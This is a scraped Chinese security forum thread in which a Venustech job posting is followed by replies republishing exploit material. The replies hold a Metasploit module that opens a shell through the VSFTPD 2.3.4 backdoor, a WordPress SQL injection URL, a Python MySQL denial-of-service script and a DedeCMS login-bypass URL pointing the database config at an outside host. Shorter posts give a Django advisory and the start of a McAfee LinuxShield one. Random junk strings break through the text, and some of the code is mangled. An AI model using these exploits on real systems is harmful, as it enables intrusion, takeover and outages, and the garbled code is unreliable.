最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    : z5 K3 J$ s- H. b8 ?# a4 w3 G* s; }/ a- A7 x

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    # i7 g5 I) E8 E# r& p+ C# s安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    + a# D  ~+ ]/ O" G% V3 \精通C语言编程

    2.+ m" C% _8 G. p  G% u* ]) x
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.) X! {% m' e0 q3 |! m# x0 l
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    3 i" U+ a" t9 C" D2 ^6 Z) q" o: F- @熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.- k: C4 S8 Y- w1 H2 M) D
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    1 |) r$ u+ a, L/ o) a/ {负责产品的系统测试、集成测试工作

    2.
    ' j/ s% X( r5 s# t- \4 Q负责产品用例的编写,执行、修改

    3.
    ; l4 Z$ \# ^& U负责产品性能的测试

    4.8 Q" f0 a5 n, I) t+ M( l! Z
    负责对外项目的支持和测试工作

    岗位要求:

    1.
    - F3 q+ k" n# r9 J& S掌握基本的tcp/ip知识

    2.
    * C" T; h$ k* y* }4 r3 ~6 I数通基础好

    3.8 [$ {0 Q8 y/ J! w1 E9 g/ W- A
    对linux有一定的基础

    4.8 |4 `: {6 @3 u: S
    掌握数据库的搭建和使用

    5., u. J& O  W* ]  _: G. F
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.4 i* s" U& V6 R. T; v
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    8 p; X/ S" v2 u3 h' Y熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.0 U* i2 N6 R7 T  e' [- T
    对网络安全设备在网络中的部署有一定的认识

    9.
    ' z- m- F) f* ]* d% V掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    % R; s1 P$ P  t) O
    木&马检测服务、WEB漏洞扫描服务的实施

    2.  J: V8 m7 C" n
    对服务客户的技术支持

    3.5 a1 |5 Z- Y3 Q( X9 b$ F7 j! r
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.* a/ D+ {5 K7 q! c( k( ~
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    % Z; j- U  A/ M% {3 L. J
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################& ~5 U# ^7 @) V/ t1 D; P  r
    * @% z0 O. }2 `
    + h& T$ V" w+ Z/ [9 [  K) O  V

    7 ^- N9 h9 X2 `' Irequire msf/core4 T" @+ k% i$ I7 }, Q! F  `
    7 W" y. o  q" ]
    class Metasploit3 < Msf::Exploit::Remote! V# {" b) e  F# ?! V5 n
    Rank = ExcellentRanking
    ) U; i% P' ]! x/ ?# p
    9 }, ^$ r9 L& Finclude Msf::Exploit::Remote::Tcp' H6 [6 @1 r3 I" e
    0 ?: U0 B) l2 n* [+ }3 X6 J
    def initialize(info = {})
    * |1 [8 Q8 t, vsuper(update_info(info! @$ Q9 c/ a9 w2 K% r- j) Y
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    8 U# [! D3 D6 v" ]Descript_ion => %q{& s7 l& \4 U8 |# S
    This module exploits a malicious backdoor that was added to the VSFTPD download
    , g0 u  V5 [5 P5 barchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between6 ?! w% i& K3 Q$ I: F) z6 ^
    June 30th 2011 and July 1st 2011 according to the most recent information
    & C) b* N: k5 G) Lavailable. This backdoor was removed on July 3rd 2011.
    : C. w4 P9 |8 k}
    ' {# X+ J1 q6 L/ JAuthor => [ hdm mc ]
    % P, b/ F$ U9 u/ BLicense => MSF_LICENSE* A& h* ?9 V1 w# ?
    Version => $Revision: 13099 $1 E7 h/ J* b! j6 k: A  e
    References =>
    & u* B; }$ ]+ I/ D" F/ X4 q0 r[5 P8 f4 D- a. v" h4 Q/ g
    [ URL http://pastebin.com/AetT9sS5]
    ' G3 G7 v) z; s' R+ N[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]7 r& y4 \; R* d4 }' ^6 k1 t% I
    ]
      ]: L3 s# j3 n( A1 _1 h! m9 gPrivileged => true: c0 d  |( v4 \5 [) ^: s
    Platform => [ unix ]4 ^6 l8 I  g9 M" E/ k/ @& p: F# }
    Arch => ARCH_CMD! R/ U3 I  S6 Q* G) R6 M4 u
    Payload =>
    % g5 X  {8 G4 V1 I{2 l5 N* s/ Y9 Y8 Y5 B0 q2 ~6 n
    Space => 2000! X% g  U4 W8 A
    BadChars =>
    : b4 \( ?5 s. |! n, K5 Z$ ?; C6 z/ ZDisableNops => true! Z3 S& |6 M0 P" T( K+ D
    Compat =>
    - _# A1 m/ g8 p- ^{
    1 O1 g3 ?& S, Q2 o* i8 _% ePayloadType => cmd_interact" q8 E# c/ N" P) j! b
    ConnectionType => find3 O8 W9 C3 U9 S/ m: v2 `4 B5 B$ e) c
    }
    * b# ]9 F" b) J* {6 C}
    ( K% F5 ]+ @! z; l0 v7 {- eTargets =>/ x/ a& H: s2 r/ x7 G8 e' o
    [
    & v& {4 b3 V' p, \5 y[ Automatic { } ]; M- U' q( ^1 U" S8 g
    ]/ t; t3 n; u; _3 c2 e4 P. F/ O1 B! s) H. j
    DisclosureDate => Jul 3 20116 f( r4 I) |8 G/ }/ @
    DefaultTarget => 0))
    9 U" o# z% j7 D- H  n* Z( `
    3 ~; c7 K" B: ~- j" \register_options([ Opt::RPORT(21) ] self.class)
    $ H" ]) x  \6 v, ?3 L5 nend
    3 _6 n/ H! n8 C- V" r! F7 \: o) g3 c) Z6 Y! D+ F" v; ?7 K
    def exploit
    - i& T8 x: K/ E0 K1 O4 p! |& ~# g! z8 x" @/ f" N2 [
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    - A% G! ?. E# s2 _if nsock) h# h/ F0 {: T2 D: w
    print_status(The port used by the backdoor bind listener is already open)
    4 a7 W, Q4 o) mhandle_backdoor(nsock)
    + }4 [4 y5 U8 z! M+ ^7 q9 N) G1 Rreturn$ \3 k7 @1 A6 q+ U. W
    end, f9 G* P) U2 z: W! U2 C

      s; A/ [) n4 M/ b, R  w; r# Connect to the FTP service port first
    5 Q4 H; a, ^1 c, o' d, A* Wconnect
    / v& D8 ~5 z$ m8 R$ t2 L- q$ N3 R0 n" C/ y8 N
    banner = sock.get_once(-1 30).to_s! X- k8 G! X5 L6 b) J* d! L
    print_status(Banner: #{banner.strip})
    , e- y& R9 Q( t) y- Q9 ~1 I
    * Q) n6 X8 T6 o- w# i: y7 _sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)& b8 B0 X6 e" o2 l1 i) N
    )6 M1 O5 p! \6 r
    resp = sock.get_once(-1 30).to_s
    % S" `- W4 M! p9 |8 Bprint_status(USER: #{resp.strip})9 D0 T; w. A! a$ ?( q

    8 t5 i1 U6 E3 Pif resp =~ /^530 /5 q+ y' G: \! o& S/ R
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    ) s( b* x6 |4 M. B9 }disconnect; V2 `6 \6 I3 N: ~. y8 [
    return
    # r! H2 k9 U! h% Kend- n5 M3 {$ N3 m+ K

    # T, q# }& ]9 x% r" `; Gif resp !~ /^331 // T  E2 Q' Y8 A
    print_error(This server did not respond as expected: #{resp.strip})) T% N' M" L4 U, P
    disconnect, S' l  w- a! o' L! t- ?
    return9 h$ x. m" a- T1 L( b' _
    end
    4 ^6 D/ R3 Q* i/ C) Q! Q4 V  }) ^3 T2 G5 D7 ^, k
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    2 v) V% j# X- A! S& @2 b)
    6 ~7 b, n7 N4 w1 }8 u  L! r! f4 b+ ^
    $ D; u8 u0 o/ z' I4 G9 R0 U. w# Do not bother reading the response from password just try the backdoor* J9 C1 `5 X# v+ ?+ I
    nsock = self.connect(false {RPORT => 6200}) rescue nil0 P7 Z9 J* h$ [: S
    if nsock/ \" @# [  t0 G
    print_good(Backdoor service has been spawned handling...)
    9 c. A2 |# T- xhandle_backdoor(nsock)
    3 A+ F! \$ T7 ?' x2 Wreturn
    6 X' ]5 N: q; J% zend" m  n3 _$ u& v# k

    5 p: c+ Z& t/ G# l: i1 Ldisconnect
    + Q3 S3 ^% [, K
    : x# P( j8 k" q5 _( g6 G! Lend
    5 Z# b) ]- Z) R' X4 i/ p1 C* h- R# y1 R: j0 {
    def handle_backdoor(s)
    2 M# |' `9 L  J6 }) ^! D# s0 |8 o$ c- T+ k  {5 q  T
    s.put(id/ _' s/ {. I2 b0 ~
    )
    ' i+ `; B: f* X+ v! Y* y6 p6 r1 _& Y0 c
    5 \' b- g3 Y# e1 cr = s.get_once(-1 5).to_s" P2 _' f3 |# H, d# j, d
    if r !~ /uid=/. p! O$ @+ c+ Y) w
    print_error(The service on port 6200 does not appear to be a shell)
    8 B. h( \& S8 Y9 C* qdisconnect(s): k- t* P# v5 y% J
    return
    $ z( h4 R# F, @9 H' Nend3 w! a/ }) w9 Z- o1 Q# z# M8 c: _2 T& f

    & f3 y$ X. s; s- ?4 [( Y# eprint_good(UID: #{r.strip})
    - C; ~, h! t  H: H5 W) l. {( L  K( q" Y- C( _6 _1 F/ N8 U) W
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    ! W$ f9 q. y! H" t. V! U7 vhandler(s)
      Q) B3 L; w; r9 Mend
    ( ]1 n' K8 n/ p3 S9 v7 Z* u! s1 ?
    end复制代码$ M3 U4 O  U/ B0 N0 G+ m

    2 a: w+ w, z9 E" s! K, ^1 I. A
    1 j& v+ k- H& a# I& z( Y8 y( S" f: [# x9 l

    3 ]9 a: [+ z' K+ Y. R+ H1 n. E; F$ [0 s
    * l5 U6 W2 I+ T( b+ O

    * N* h6 [" C' D4 x. P. D
    " |; D9 ]6 h. h  {4 _* j, c
    ) Z/ K7 [0 a' x# g9 R9 s( Q& t3 Y2 S

    6 f$ [5 N  D! G0 p& K
    6 E  r* d( P& h0 T% T, [4 {1 {9 A6 l2 k3 t6 g2 f4 S# j' [
    2 Y3 P! ~+ C; d+ z- `

    ( l8 D. U7 J2 D0 T, `( t% V, V' L7 u: L) [4 {4 h7 D( S
    $ o0 u- m9 V& T: M
    * D  a2 ~+ l( F1 b( v
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:4 R" r2 N7 C3 c1 U& F( X6 z
      
    ' |% m6 b" I$ ^- c     + b- q0 y# l! b6 E. t
      8 X. F! W  q! v4 m( L
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress( a3 V1 R3 q7 a. P/ U5 k
    allows an authenticated user to execute arbitrary SQL commands via the id
    * `% `+ m8 L! E$ V- X: I, \parameter to wp-admin/admin.php. 6 m( |0 N6 d7 O: K
      4 q# p( V# a* c" G
       9 |+ \# P5 g7 L! [( y; }) x
      / Z% P+ F4 Z: Q7 \& P
    2. Proof of Concept:
    ! H3 f% P- @  [) Z8 K+ V8 s8 k7 K& {  
    6 U( S2 e3 V4 m9 h) k+ M$ l   " `( y8 D" D+ b
      ' f5 N% F* A+ _2 _, ]
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id" B+ I( r! z% u
    =1 AND SLEEP(10)4 R! j' {- Q# A$ R. P" A" h7 ?

    + S9 L/ B: P: N0 m  U! x" ?  g  
    ; z* Z0 k- [+ Q* `: S   
    1 H. |  O- [* k# G  2 x8 a$ G6 B9 [1 z. n* V6 I
    3. Solution:: x" B1 t1 S' `" S
        L, y7 R* m' @
         
    . p" j/ }5 o+ u$ C% X" M+ G  
    9 x/ O  a, j& N4 x1 F( l% x, u  JThe plugin has been removed from WordPress. Deactivate the plug-in and wait
    4 `+ P) b1 i2 i$ W) G- U0 bfor a hotfix.
    / O! ], [% r& H2 ~- F) C& h" Y& J; c  
    ( Y9 L0 _: `9 K/ K- v$ D4 X4 G   6 U3 E4 x! f& ?! y
      ! ^5 A* \7 W0 T3 ~1 ~5 _
    4. Reference:& j5 Q, r( n: P# C# Q7 C
      
    " ]* N) [$ u; x( [4 M( V: u     F1 k9 H& W* C, A" s
      
    * O( l- ~' ~& _$ c* H1 L- Z" @http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    , l  j" z1 B4 c8 F: Q$ ~8 ?- d  @ction-sqli/
    ! t. W( w' b* V5 H4 }) j- I  8 S! A3 w$ T1 \/ \
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    5 S: b8 f; @- p! i  T  y% ?
    9 i+ J9 m3 \$ b) Z- ~$ Y. {$ b3 }# N& U
    ( b. E" |8 j/ S/ O' Q7 p
    0 d; ~9 D% `7 w( \- i$ t
    ( K, `' f( U8 [# P' [% a) P- Y( t9 E

    ! n3 I# B/ F9 a6 o1 E
    : H0 k; @4 ?% j0 \& P/ T5 x) u8 R+ ?. ~: P- C2 H) y
    3 L+ [) P# G  }( |; J* Z
    # ], B' V. ?8 [
    ' ]' ]# Z; f; Y4 \/ f( K0 r1 Q
    3 c: o0 @# G7 \/ o( |; P' |  }" k

    : R5 r: a6 S' _" x9 m, H
    : v$ B, |) u8 G
    * X3 k- e6 Z5 x3 P& p0 @& W3 t4 O, T$ x) g2 j9 k6 P" b- r3 y
    ( d; {" r" m3 i% v& t2 D$ m

    ' Q' Q) e/ i8 k) I7 g公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys6 G5 I% I6 S6 {7 q

    2 G+ G% k! Q1 Q! Uprint ". k) R  a" }' ^2 J; M$ K
    "
    " Y- Q. G& k& P- g( ~2 e, cprint "----------------------------------------------------------------"3 Q5 p- T5 K/ C% `' l6 W
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    7 a& S5 ^5 c# {, q# `9 J( m3 Iprint "| Level Smash the Stack                                         |"; R( u# z! Y2 Q: S& {8 a$ x
    print "----------------------------------------------------------------"
    - w! k/ n" O' P0 s: ?% W/ r) lprint "2 X0 c+ K7 Y1 H9 n5 F9 s
    "2 w2 \* f5 E( S! p+ K
    $ k5 ^8 y& n# v% C9 e  l0 a
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"$ `6 J" z, c+ L* V
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    9 G- `2 b: n5 G  b. j 6 F5 V4 ~" |2 A0 n" y
    buf2=("x11x00x00x00x03set autocommit30")
    * I; s( d8 S: V
    7 ^- U2 ]( u2 [3 `7 ~def usage():
    * S. x5 X( I5 ?: }print "usage : ./mysql.py <victim_ip>"4 n9 _  r$ u. U4 S
    print "example: ./mysql.py 192.168.1.22"" l* d# {# O! Z
    : I! N5 W) x& J$ L" H

    & \: t/ z& |/ b% `1 n; Wdef main():+ H& P1 e8 X7 z" U
    if len(sys.argv) != 2:
    & w; w# V1 H/ I; @& y" Z3 [' gusage()6 S2 m! G& D8 z" W. j/ ^
    sys.exit()
    # l( L2 A! ~! x; X, ws = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    3 N: ?" Q* B& q) e / b$ m0 }8 u* O  n. Y) P
    HOST = sys.argv[1]# U; K& Y' G2 J8 ~2 {
    PORT = int(3306)/ }( _* c7 S" K- P& Y& z* c2 ?
    s.connect((HOST,PORT))
    - V* A* }5 ~- {0 \print "
  • Connect"
      |8 a4 {3 C8 m* W' g  zs.send(buf)& v6 c8 a# C" L/ C% \- [
    print "
  • Payload 1 sent"5 `9 D  C) B4 [8 `, _0 e1 A
    s.send(buf2)
    2 K3 P$ h: R! Y! b0 j- [) M1 Gprint "
  • Payload 2 sent
    - Q8 C3 [$ o# b! I", "
  • Run again to ensure it is down..
    ! J- |+ J5 h/ \3 j4 Y"
    - v; |, s. [5 p* a4 O4 As.close()
    6 L( j  f) |1 G( F7 h4 w ! ]7 n  l8 S) c- f
    if __name__ == "__main__":
    # V% U1 M2 e, @+ Z1 N, nmain()
    ) B) A+ ]& }, R, A- [4 ~+ }: T9 j8 L) {; f1 O6 m* G

    8 [6 C0 h# i( f( s, E: e/ K' \# s8 n' R0 `* Z0 ^. Y9 J( [3 l

    # w/ Y5 B4 E0 `/ G! t2 S5 t3 \0 {3 V+ m0 G1 B8 z" q
    / \) Q, }. B6 h2 j( P

    " j- G! j: x4 N  m  K) A! w" u9 o: W8 b

    1 S# J* ]$ e& U# C) [" E; r5 l7 w
    " g" A$ h  X1 u0 F. m
    5 ^2 G1 u# Z8 D2 p
    . L/ s3 y7 M3 c' \- ]
    & @; {. T$ l; v6 v' f6 ~8 b& ?- Y, b# X

    ! m$ o2 G6 o: ]; X* z" X
    3 v! n* b8 _0 z+ X, r
    ! ^3 Q& P/ u: p1 G0 }/ Y/ A, `0 q8 B) L) [: Q0 X- q8 Y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
      o, O& k! d/ m, z$ L. s0 v/ w. x& g
    http://www.sitedir.com.cn/video/4.swf
    8 X$ ^' S, M+ T1 T5 z, c! V8 N) P3 ^& O, E# f9 x3 ?
    , x+ i  }! C5 G) P" f
    9 s' P% g8 k' G: W  a6 W1 u

      o0 v0 k7 A9 L+ j( M! @$ E
    0 h  {, g# y$ T8 S5 Q" q4 m: E5 L; s
    3 v  W7 M+ [6 f
    5 ~( C6 \) P- U2 E: K; j- c! X
    , @( g& Z: z$ g6 L0 s9 x: R

    3 q1 R: v# _# l! V1 H5 A  b9 r0 ]# I8 w* A) `- ]! A3 {' S
    2 ]: h* J. x: w: G) m! D
    0 b, u+ ~# |) l$ L3 P
    * a1 L0 R1 v* A* F7 d2 A# k
    % B: `( [2 X$ C: _8 _1 G7 P/ [. Y
    6 W1 j! Z+ n. `( v( c1 e9 @
    : i& l! j4 W  n4 D
    - g6 ~7 W1 t; A) p/ \/ g
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    & }" s0 y- B8 `- q  T5 K
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    / e8 @* v2 ?7 B: r6 [2 _3 R
    此漏洞的前提是必须得到后台路径才能实现

    : E/ H( t$ {3 H
    官方临时解决办法:
    ) C( A) S6 c- ~3 }. V3 L
    找到include/common.inc.php文件,把:

    ; {" }7 Z8 B& k, d8 R1 v
        foreach($_REQUEST as $_k=>$_v)
    % s6 p% ^7 r' G* a    {3 g1 ]! A2 s' A9 P
            var_dump($_k);8 v1 C7 C0 N3 d- L; s
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )9 ^! a5 G; E+ \
            {
    1 w* L! b& o7 J' ]- m2 c            exit('Request var not allow!');2 Q" K8 _7 {0 v; Y, e
            }7 k) z* l+ U0 h3 ?- |
        }
    2 P+ m  I  M, }2 N9 x
    换成:
    7 R4 }& M9 D: G6 Z: C; P7 y% \% a
        //检查和注册外部提交的变量
    , d* Q  S' J/ k) V9 l; C5 N    function CheckRequest(&amp;$val) {
    3 g7 i" e" W* [8 |6 g        if (is_array($val)) {
    1 b% K8 d* X5 C9 _: x            foreach ($val as $_k=>$_v) {
    ; _( r3 c/ m8 U; d7 N                CheckRequest($_k);
    . ]% ?: A' b& Z9 \! T' w                CheckRequest($val[$_k]);
    ( l+ |, \  J( O2 \8 F            }4 Q6 j$ p8 S5 e. I8 Q( }
            } else4 v2 J5 A8 v+ X, e- C
            {4 P5 C2 L; `5 f7 n
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    ( y' m) f$ C! O6 z            {
    - r- C, i4 g" X9 ?* b: I                exit('Request var not allow!');
      G! F7 e( s0 u1 Q: x            }
    2 [0 o. l, k8 Y: T8 S        }  v4 \) X" c3 E" Q& \
        }
    6 c# N% W3 A8 v# N    CheckRequest($_REQUEST);
    4 H* [8 ^; {: D4 o

    " ]6 C" l+ b" q1 b% D1 K4 E6 a9 c* i

    0 {1 |" h' c. z+ Z' z7 A1 O5 f' u/ L' D  R1 k

    * S/ x; v% O- N
    / X: M$ c$ y* k9 j. p) |7 X
    8 M$ x8 ~& d! W! c7 F! f/ }: R, f! i5 ~$ W( k, ^
    : I2 w7 E8 X; x- |7 ~5 ]

    3 u1 C  D$ A$ }2 _$ ?7 Z  t% i3 H; I, _# ~; N5 B0 b' {. k: |, q
    . O; S' K6 j5 r8 u3 {. w

    , t% L0 W: y6 d; t  X8 o$ @3 z, [2 M! @2 \, ]& G
    : y8 Q0 z0 i  Q, a7 {
    ( C- }2 y3 a8 u; R9 a4 a

    / v9 B) H2 F5 S, Q; |8 I  ^* M6 S/ [/ n: R0 Q  v9 a8 P- `
    ! e( e& o, w2 T, D  {7 Z
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>* t/ z- S( ]( Z  X; `* L2 z7 @

    8 U: k. g* @  @5 mhttp://www.sitedir.com.cn/video/8.swf[/quote]' `  a6 n- q2 R" y0 F
    6 m( v$ X" r5 v$ v  F7 S+ B2 ?8 `4 z

    + s" [% Y! o9 d" `$ Y  d6 ?4 Z* c$ q  A' M) v

    " k' {' U5 s/ b% }% \+ `0 C! p
    : U  v9 A0 }3 m& A: H
    5 q" ?! H6 h6 P& Z2 r6 Q6 z& I2 M
    + c7 l8 G) m# e8 |+ y( ?  q) D1 u+ C1 u

    * J+ P4 |+ i4 A. O" q3 P) O/ x+ S6 }: c4 A+ a' y

    # |8 T- H, u3 A/ P
    ) p) ]; x$ _  K. J4 M! s$ Y9 w' `& \5 M- Q
    5 O5 k, q0 s. M4 _

    : d7 |9 L& k- t
    1 Z( V6 N2 `( S; Q1 r$ ]$ D6 R" `/ V3 H. M3 z3 S( p8 |( b$ c! B

    1 s" ^* g5 F" Z/ o公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    # _. s+ F  K/ O1 u4 r- r
    影响版本:' o  D6 J+ I$ i3 r: N* S6 r+ I
    Django 1.2.5
    8 ?" J" \$ J& W% h% zDjango 1.3 beta 1
    / N0 W, {& N; i7 m4 h5 S6 T1 ^9 SDjango 1.2.48 `3 g9 H( h. k
    Django 1.2.24 Z5 \9 J$ ^: p! y* I
    Django 1.2
    / j3 j- F8 i8 f
    漏洞描述:
    * S4 W, B: b: n3 m
    Django是一款开放源代码的Web应用框架,由Python写成。0 F' H: b" Z  v6 j& [: {, E. K! ]) s
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。  r5 R0 g/ F* J: }1 @: z
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    5 I! e# O8 }/ Y1 W* M* _2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    2 b% c5 e' y& H% S* y  H& E* P3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。) n0 X1 g+ l$ y
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    . F" d3 I# }- h- M/ ]
    细节参考: . p  A5 I" Y! }5 g
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
      ]" {8 S% `. n, L. U: z& P8 yhttp://secunia.com/advisories/45939/
    & r; D; v7 Y- E4 ]% H1 Y( m

    $ {9 C, ]# D; x2 M2 k
    3 q+ a2 H8 r# q7 T
    # `, O$ }% c$ \$ s4 @1 d
    3 s% B" b, a3 ^% k7 x1 Y1 q) G3 G8 }8 E, G

    6 P6 g  }0 P" c6 b/ [  E6 {: u& O2 t4 G1 R, V4 T9 B) j+ q

    4 v2 p5 k* i' X5 Y2 {' ]5 i# B8 i4 C2 k% e+ j3 B% S- X
    5 n7 |+ `/ `. C1 g5 L, Q5 e4 y

    / N; e* L; v5 R. b% b" V9 o' @% N+ J8 O8 C% \: ~

    7 I8 Y) }& q$ V; F3 l; d" R7 Z. w+ ?/ e7 z. p# H0 D" g" K' X
    7 h, a- r. q; y. h: r
    4 v9 {* a5 A1 Q4 \$ }

    ( o" E3 l5 ?8 s# H1 G5 I/ d
    . |$ u+ W+ |; X: c8 `* K' u4 k, Q$ K" @0 Y. ^3 Y1 J
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
      k& I: U3 `/ ]: g( {影响版本: McAfee LinuxShield <= 1.5.1% [' ^9 r! z( ]- v/ X# Q; F
    远程攻击: Yes 1 O1 ~0 E! c- ?% r# w+ ]
    本地溢出: Yes
    " s' h' ^; q9 t背景阅读:
    # y8 ^! @% P8 @8 f7 j2 F0 f===========8 M9 G" m" Q0 h8 E/ ^  M" \

    : y  }4 Z4 N1 _' \  }4 ULinuxShield detects and removes viruses and other potentially unwanted
    0 I6 b( f/ ?( _0 @software on Linux-based systems. LinuxShield uses the powerful McAfee: n4 a& F) W/ N1 _1 K, _
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our4 ~; C# U8 o* M
    anti-virus products.2 o& v  L2 s8 ?+ @7 ]) n+ Z' ?
    . `1 E: t2 [; _+ i! f
    Although a few years ago, the Linux operating system was considered a
    7 C+ m8 E6 K' u: ?. {( Y! U3 ysecure environment, it is now seeing more occurrences of software  V/ e8 q8 `+ I3 t3 u# q  ]
    specifically written to attack or exploit security weaknesses in
    + y* u; {0 i" {' n& S) j8 i! HLinux-based systems. Increasingly, Linux-based systems interact with) Z! D8 [7 k% |" e; k' y7 d* m, q7 s3 }
    Windows-based computers. Although viruses written to attack Windows-: V5 J1 B, @  _( \* b
    based systems do not directly attack Linux systems, a Linux server* a3 I" {3 x0 b) Q
    can harbor these viruses, ready to infect any client that connects to3 N3 W! P6 U" h2 S
    it.
    4 P4 }3 T2 n9 S' q$ P- q& c: k/ U' s4 F
    When installed on your Linux systems, LinuxShield provides protection( c9 g  _( z0 r/ W! w7 f- i5 K
    against viruses, Trojan horses, and other types of potentially: J6 U! l. b% B6 P
    unwanted software./ u7 T& u- i2 s" l# Q( L
    - h1 f7 _/ Y% E: C
    LinuxShield scans files as they are opened and closed
    4 Q. t  s: q# w?&amp;#65533;&amp;#65533; a technique
    3 _9 P, I' P8 I. ^6 |. l- ]/ lknown as on-access scanning. LinuxShield also incorporates an6 k4 |! ?. s- d( K& A; J# J% a
    on-demand scanner that enables you to scan any directory or file in
    & e7 `; |5 j4 ]1 p2 _; Y& }your host at any time.
    ' [% C( `3 W% K* _. x2 W8 {
    0 g% B: u3 [) T  {5 mWhen kept up-to-date with the latest virus-definition (DAT) files,4 ~7 p1 D. v- C+ M3 b+ B0 ]% B
    LinuxShield is an important part of your network security. We/ S+ P& u4 {* T- V4 j$ g* x2 ?7 ~
    recommend that you set up an anti-virus security policy for your
    1 h# K6 H  h  O% m5 b$ r- l- Dnetwork, incorporating as many protective measures as possible.5 ?6 A, g( A! O* H- M: c
    " ]" a0 v  P/ a) ]: d
